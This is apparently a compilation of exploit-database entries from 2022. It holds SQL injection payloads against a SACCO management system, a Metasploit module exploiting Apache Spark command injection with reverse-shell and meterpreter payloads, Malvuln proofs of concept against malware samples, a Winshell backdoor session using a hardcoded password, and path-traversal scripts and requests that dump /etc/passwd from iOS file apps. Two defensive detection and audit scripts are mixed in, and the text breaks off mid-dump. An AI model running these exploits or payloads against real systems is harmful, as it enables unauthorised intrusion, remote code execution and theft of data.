<pre><code>## Title: SACCO-2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 08.27.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/SACCO<br /><br />## Description:<br />The `username` parameter of the SACCO-2022 system appears to be<br />vulnerable to SQL injection.<br />A malicious user can dump the database from this system and<br />use it for malicious purposes.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=mayuri.infospace@gmail.com' AND (SELECT 6479<br />FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT<br />(ELT(6479=6479,1))),0x71767a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# UWlq&password=admin<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mayuri.infospace@gmail.com' AND (SELECT 7854<br />FROM (SELECT(SLEEP(5)))OzkN)# Lpgs&password=admin<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/SACCO)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iswun6)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Spark Unauthenticated Command Injection RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in Apache Spark.<br /> Successful exploitation results in remote code execution under the context of the Spark application user.<br /><br /> The command injection occurs because Spark checks the group membership of the user passed<br /> in the ?doAs parameter by using a raw Linux command.<br /><br /> It is triggered by a non-default setting called spark.acls.enable.<br /> This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.<br /><br /> Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure<br /> ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis<br /> ['CVE', '2022-33891']<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'WfsDelay' => 5<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => 
[<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_python'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['printf', 'curl'],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-07-18',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> b64 = Rex::Text.encode_base64(cmd)<br /> post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/'),<br /> 'data' => post_data<br /> })<br /> rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e<br /> elog("A communication error occurred: #{e.message}", error: e)<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited!")<br /><br /> res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")<br /><br /> return CheckCode::Unknown('Did not receive a response from target.') unless res<br /><br /> if res.code != 403<br /> return CheckCode::Safe('Target did not respond with a 403 response.')<br /> end<br /><br /> sleep_time = rand(5..10)<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /><br /> res, elapsed_time = 
Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /><br /> print_status("Elapsed time: #{elapsed_time} seconds.")<br /><br /> unless res && elapsed_time >= sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> print_status('Exploiting...')<br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space<br /> end<br /> end<br />end<br /></code></pre>
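The module description above pins the weakness to a `doAs` value reaching a raw group-lookup command when the non-default `spark.acls.enable` setting is on. As an added defender-side example (not code from the Metasploit module or from Apache Spark), the following flags requests whose `doAs` parameter carries shell metacharacters and checks a `spark-defaults.conf` fragment for that setting; the log lines and config text are constructed, and the Apache-style access log format is an assumption about whatever proxy fronts the Spark UI.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Shell metacharacters that have no place in a user name that Spark hands to a
# group-lookup command: backticks, $(...), pipes, separators, redirects, newlines.
SHELL_META = re.compile(r"[`|;&<>\n]|\$\(")

# Apache-style access log line. Assumption for this example: the reverse proxy
# in front of the Spark UI writes this common format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_doas(value):
    """True if a doAs value (raw or percent-encoded) carries shell metacharacters."""
    return bool(SHELL_META.search(value) or SHELL_META.search(unquote_plus(value)))


def doas_values(target, body=""):
    """Collect every doAs value from the query string and an optional form body."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("doAs", [])
    if body:  # only available when a WAF or proxy logs POST bodies
        values += parse_qs(body, keep_blank_values=True).get("doAs", [])
    return values


def scan_log(lines):
    """Return (client ip, status, decoded doAs value) for each suspicious request.

    A rejected doAs normally yields 403, so repeated 403s with odd doAs values
    from one client are the pattern worth alerting on.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in doas_values(m["target"]):
            if suspicious_doas(value):
                hits.append((m["ip"], int(m["status"]), value))
    return hits


def acls_enabled(conf_text):
    """True if spark-defaults.conf text sets spark.acls.enable to true."""
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2 and parts[0] == "spark.acls.enable":
            return parts[1].strip().lower() == "true"
    return False


# Constructed sample log lines (not captured from a real deployment).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2022:10:00:01 +0000] "GET /?doAs=alice HTTP/1.1" 403 0',
    '10.0.0.9 - - [18/Jul/2022:10:00:07 +0000] "GET /?doAs=%60sleep%205%60 HTTP/1.1" 403 0',
    '10.0.0.9 - - [18/Jul/2022:10:00:20 +0000] "GET /?doAs=alice%3Bid HTTP/1.1" 403 0',
    '10.0.0.5 - - [18/Jul/2022:10:01:00 +0000] "GET /jobs/ HTTP/1.1" 200 5120',
]

# Constructed spark-defaults.conf fragment with the risky setting enabled.
SAMPLE_CONF = "spark.ui.port 4040\nspark.acls.enable true\n"

if __name__ == "__main__":
    for ip, status, value in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} doAs={value!r}")
    print("spark.acls.enable:", acls_enabled(SAMPLE_CONF))
```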
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/44aba241dd3f0d156c6ed82a0ab3a9e1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Win32.Hive.bv<br />Vulnerability: Arbitrary Code Execution<br />Description: Hive Ransomware will load and execute arbitrary .EXE PE files if a third-party adversary or defender uses the vulnerable naming convention of "vssadmin.exe" or "wmic.exe" and the PE file is placed in the vicinity of Hive Ransomware when it is executed.<br />Family: Hive<br />Type: PE64<br />MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1<br />Vuln ID: MVID-2022-0636<br />Disclosure: 09/06/2022<br /><br /><br />Exploit/PoC:<br />1) Compile to "vssadmin.exe"<br />2) Supply Hive CL credentials e.g. -u <login>:<password><br /><br />"vssadmin.c"<br /><br />#include "windows.h"<br />#include "tlhelp32.h"<br />#include "psapi.h"<br /><br />//Compiled x64<br />//By Malvuln - 2022<br />//Purpose: RCE PWN Hive Ransomware<br />//MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />DWORD getParentPID(DWORD pid){<br /> HANDLE h32 = NULL;<br /> PROCESSENTRY32 pe = {0};<br /> DWORD ppid = 0;<br /> pe.dwSize = sizeof(PROCESSENTRY32);<br /> h32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);<br /> if(Process32First(h32, &pe)){<br /> do{<br /> if (pe.th32ProcessID == pid){<br /> ppid = pe.th32ParentProcessID;<br /> break;<br /> }<br /> } while( Process32Next(h32, &pe));<br /> }<br /> CloseHandle(h32);<br /> return (ppid);<br />}<br /><br />int main(void){<br /> DWORD ppid = getParentPID(GetCurrentProcessId());<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, ppid);<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> MessageBox(NULL, "Not the vssadmin.exe you wanted :(\nHive Ransomware PWNED!\n\nBy Malvuln", "Code Execution PoC\n", MB_OK);<br /> }<br /> return 0;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Autoit.fhj<br />Vulnerability: Named Pipe Null DACL<br />Family: Autoit<br />Type: PE32<br />MD5: d871836f77076eeed87eb0078c1911c7<br />Vuln ID: MVID-2022-0638<br />Disclosure: 09/06/2022<br />Description: The malware creates two processes "xservice.exe" and a child process "xps.exe". The process creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.<br /><br />RManFUSCallbackNotify32 <br />RManFUSServerNotify32<br /><br />\\.\Pipe\RManFUSCallbackNotify32<br />RW Everyone<br /><br />Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.<br /><br />Exploit/PoC:<br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br /><br />/*<br />Trojan.Win32.Autoit.fhj.d871836f77076eeed87eb0078c1911c7 <br />NamedPipe Exploit Deny Access to Everyone<br />By Malvuln<br />**/<br /><br />#define VULN_TROJAN_PIPE "\\\\.\\pipe\\RManFUSCallbackNotify32"<br /><br />int main(void){<br /><br /> HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);<br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> <br />if (hPipe == INVALID_HANDLE_VALUE){ <br /> printf("%d", GetLastError()); <br /> return 1;<br />}<br /> <br /> if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = TEXT("Everyone");<br /> 
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> return 1;<br /> }<br /> <br /> if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("%d", GetLastError());<br /> return 1; <br /> }else{<br /> printf("Trojan.Win32.Autoit.fhj PWNED!\n");<br /> printf("By Malvuln\n");<br /> }<br /> <br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hPipe);<br /><br /> system("pause");<br /><br />return 0;<br />}<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: FE File Explorer 11.0.4 Local File inclusion<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link: https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524<br /># Version: 11.0.4<br /># Tested on: iPhone ios 15.6<br /><br /><br />from ftplib import FTP<br />import argparse<br /><br />help = " FE File Explorer Local File inclusion"<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File To Open eg: etc/passwd", required=True)<br /><br />args = parser.parse_args()<br /><br /><br />ip = args.target<br />port = 2121  # Default Port<br />files = args.file<br /><br /><br />ftpConnection = FTP()<br />ftpConnection.connect(host=ip, port=port)<br />ftpConnection.login()  # no credentials: ftplib logs in as anonymous<br /><br />def downloadFile():<br />    # Step above the served directory, then fetch the requested path<br />    ftpConnection.cwd('/../../../../../../../../../../../../../../../../')<br />    with open('data.txt', 'wb') as out:<br />        ftpConnection.retrbinary(f"RETR {files}", out.write)<br />    ftpConnection.close()<br />    with open('data.txt', 'r') as file:<br />        print(f"[***] The contents of {files}\n")<br />        print(file.read())<br /><br />downloadFile()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8c0e6ec6b8ac9eb1169e63df71f24456.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Spy.Win32.Pophot.bsl<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a BATCH file ".bat" to the C: drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the file dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: Pophot<br />Type: PE32<br />MD5: 8c0e6ec6b8ac9eb1169e63df71f24456<br />Vuln ID: MVID-2022-0635<br />Disclosure: 09/06/2022 <br /><br />Exploit/PoC:<br />C:\>type zhqbdf.bat<br /><br />"C:\WINDOWS\system\zhqbs080722.exe" i<br />del %0<br /><br />C:\>cacls zhqbdf.bat<br />C:\zhqbdf.bat BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/121bf601275e2aed0c3a6fe7910f9826.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hupigon.aspg<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Attackers who can place an arbitrary executable named "Program.exe" under c:\ drive can potentially undermine the malware by having it run theirs instead with LocalSystem privs.<br />Family: Hupigon<br />Type: PE32<br />MD5: 121bf601275e2aed0c3a6fe7910f9826<br />Vuln ID: MVID-2022-0634<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />C:\dump>sc qc VServer_2007<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: VServer_2007<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\Common Files\Microsoft Shared\MSInfo\R_Server.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : V_Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
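The `sc qc` output above shows the whole problem in one field: a BINARY_PATH_NAME with spaces and no surrounding quotes, running as LocalSystem. As an added example (not from the advisory), the following parses that output format, decides whether the image path is unquoted with spaces, and produces the quoted form an administrator would set (for instance with `sc config <service> binPath= "<quoted path>"`). The sample dump is constructed from the values the advisory quotes.

```python
import re


def parse_sc_qc(output):
    """Parse the 'KEY : VALUE' lines of `sc qc` output into a dict."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def split_image_path(bin_path):
    """Return (executable, arguments) from a service binary path string."""
    s = bin_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end != -1:
            return s[1:end], s[end + 1:].strip()
        return s.strip('"'), ""
    # Unquoted: take the first .exe as the intended image; whatever follows it
    # is treated as arguments (assumption made for this example).
    m = re.search(r"\.exe\b", s, re.IGNORECASE)
    if m:
        return s[:m.end()], s[m.end():].strip()
    return s, ""


def is_unquoted_with_spaces(bin_path):
    """True when the image path is unquoted and contains a space, the condition
    under which Windows tries each space-delimited prefix of the path before
    reaching the real image."""
    s = bin_path.strip()
    if s.startswith('"'):
        return False
    exe, _args = split_image_path(s)
    return " " in exe


def quoted_bin_path(bin_path):
    """Quote the executable portion, leaving any arguments untouched."""
    exe, args = split_image_path(bin_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit_service(output):
    """Summarise one `sc qc` dump: service name, account, verdict and the fix."""
    fields = parse_sc_qc(output)
    path = fields.get("BINARY_PATH_NAME", "")
    vulnerable = is_unquoted_with_spaces(path)
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "runs_as": fields.get("SERVICE_START_NAME", ""),
        "vulnerable": vulnerable,
        "fix": quoted_bin_path(path) if vulnerable else path,
    }


# Constructed sample in the format the advisory quotes (values taken from it).
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VServer_2007
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Common Files\Microsoft Shared\MSInfo\R_Server.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : V_Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    print(audit_service(SAMPLE_SC_QC))
```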
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5bc5f72d19019a2fa3b75896e82ae1e5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Winshell.5_0<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware is UPX packed, listens on TCP port 5277 and requires authentication for remote access. However, the password "123456789" is weak and hardcoded within the PE file. Unpacking the executable easily reveals the cleartext password.<br />Family: Winshell<br />Type: PE<br />MD5: 5bc5f72d19019a2fa3b75896e82ae1e5<br />Vuln ID: MVID-2022-0633<br />Disclosure: 09/06/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 5277<br />Password:123456789<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>?<br /><br />i Install<br />r Remove<br />p Path<br />b reBoot<br />d shutDown<br />s Shell<br />x eXit<br />q Quit<br /><br />Download:<br />CMD>http://.../srv.exe<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: FTPManager 8.2 Local File inclusion<br /># Date: Sep 6, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.skyjos.com/<br /># Software Link:<br />https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186<br /># Version: 8.2<br /># Tested on: Ios 15.6<br /><br /><br /><br />GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1<br />Host: 192.168.1.178:8080<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br />AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e<br />Safari/8536.25<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br /><br /><br /><br />------------------<br /><br />HTTP/1.1 200 OK<br />Connection: Close<br />Server: GCDWebUploader<br />Content-Type: application/octet-stream<br />Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT<br />Date: Tue, 06 Sep 2022 03:05:05 GMT<br />Content-Length: 2581<br />Cache-Control: max-age=3600, public<br />Etag: 1152921500312311384/1657708546/0<br /><br />##<br /># User Database<br />#<br /># This file is the authoritative user database.<br />##<br />nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false<br />root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh<br />mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh<br />daemon:*:1:1:System Services:/var/root:/usr/bin/false<br />_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false<br />_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false<br />_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false<br />_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false<br />_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false<br />_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false<br 
/>_securityd:*:64:64:securityd:/var/empty:/usr/bin/false<br />_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false<br />_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false<br />_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false<br />_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false<br />_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false<br />_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false<br />_ondemand:*:249:249:On Demand Resource<br />Daemon:/var/db/ondemand:/usr/bin/false<br />_findmydevice:*:254:254:Find My Device<br />Daemon:/var/db/findmydevice:/usr/bin/false<br />_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false<br />_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false<br />_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false<br />_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false<br />_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false<br />_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false<br />_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false<br />_diskimagesiod:*:271:271:DiskImages IO<br />Daemon:/var/db/diskimagesiod:/usr/bin/false<br />_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false<br />_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false<br />_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false<br />_accessoryupdater:*:278:278:Accessory Update<br />Daemon:/var/db/accessoryupdater:/usr/bin/false<br />_knowledgegraphd:*:279:279:Knowledge Graph<br />Daemon:/var/db/knowledgegraphd:/usr/bin/false<br />_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false<br />_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false<br />_trustd:*:282:282:trustd:/var/empty:/usr/bin/false<br />_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false<br />_darwindaemon:*:284:284:Darwin 
